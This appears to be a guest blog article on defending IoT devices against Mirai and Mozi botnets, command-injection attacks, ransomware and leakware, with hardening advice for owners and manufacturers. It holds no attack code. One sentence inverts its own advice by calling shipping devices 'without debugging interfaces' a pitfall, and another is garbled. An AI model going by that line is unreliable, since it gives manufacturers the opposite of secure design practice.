IoT Malware Attack Protection Amidst Covid-19 Threats
Guest WriterGuest Writer
IoT devices are now standard consumer and commercial technology. Their growing availability and often poor security means they have emerged as a significant target for hackers. At the same time, the pivot to remote work during COVID-19 has encouraged cyber criminals to ramp up their efforts, making networks of all kinds much more vulnerable to attack.
Malware that targets IoT devices is rising, and cyber criminals are leveraging botnets in attacks more often.
Owners and developers of this technology should know how malware can infect IoT devices and the steps they can take to defend their products.
In 2020, most new IoT attacks were driven by two prominent IoT botnets: Mozi and Mirai. Mirai is an older botnet that first appeared in 2016, while Mozi was deployed in 2019. Mozi is likely based on Mirai, as the two botnets have significant code overlaps.
These botnets have become so extensive that, according to IBM security research, they account for “90% of observed traffic flowing to and from all Internet of Things (IoT) devices.” The botnets function by using already infected devices to target and infect others, exploiting vulnerabilities in an attempt to infect them with code that will make them part of the botnet.
IoT security is significantly changing due to malware, leaving devices unprotected and at risk.
Once the botnet is large enough, the hackers behind the network can use them to launch DDoS attacks. Because they’re distributed across a vast network of infected smart devices, they can be almost impossible for a host to respond to.
The same report also found that all IoT devices, regardless of function, are likely at risk. Hackers attacked a wide variety of smart devices, including IoT printers, signs, and TVs connected to corporate IT networks.
In addition to botnet malware, IoT end-users and manufacturers also have to contend with increasingly frequent ransomware and leakware attacks. Ransomware attacks hold devices or files hostage in exchange for payment from the victim. Leakware is similar, but the hacker instead threatens to leak or release confidential files if the victim does not pay.
The Mozi and Moirai botnets typically infect new devices through the use of command-injection (CMDi) attacks. This is a common tactic used against IoT devices, as it allows hackers to exploit common IoT security vulnerabilities and misconfigurations.
Three primary factors can make a device much more vulnerable to CMDi attacks. IoT systems often contain a web and debugging interface leftover from firmware development. Hackers can exploit them to gain access to the device. PHP modules built into IoT web interfaces can also provide access to hackers.
Online IoT interfaces can also make devices much more vulnerable. Administrators often fail to harden these interfaces by not sanitizing remote inputs. Without sanitization, cyberattackers can input shell commands, allowing them to do just about anything they want — including using shell commands like “curl” or “wget” to retrieve malicious websites.
End users should carefully research IoT devices and their developers before a purchase. Developers with a good track record on security are often more likely to market IoT devices that are easier to secure. They should also implement good safety practices.
Changing the default password on new devices, downloading security patches, and deactivating unnecessary features — like remote access tools — are good starting points. Regular maintenance of IoT devices to ensure they are fully patched and monitored by business security software will also help.
Network segmentation can limit the access IoT devices have to the business network. If compromised, this segmentation will reduce the potential damage these machines may cause.
The use of antiviruses, network traffic analysis tools, and other cybersecurity software can help end-users manage and monitor potential threats.
Companies should also be aware of how employee smart devices may be interacting with their business network. They may not be as secure as items IT workers have direct access to.
Manufacturers should also take steps to ensure IoT devices they produce are secure. Considering security at every step in the design process and avoiding common security pitfalls — like shipping items without debugging interfaces — will help businesses make more secure products.
The average development and release of security patches will also be essential in keeping devices protected from malware attacks.
Cybercriminals are likely to ramp up attacks in the near future. Owners of IoT devices will likely continue to face malware, ransomware, and leakware threats. Best practices can help end-users keep their items safe. Even techniques as simple as regular patching can go a long way in keeping smart technology secure.
Manufacturers can also take action to create safer IoT devices. Avoiding common vulnerabilities and employing secure design practices will help ensure an end product is less vulnerable to attack.
New Podcast Episode
Recent Articles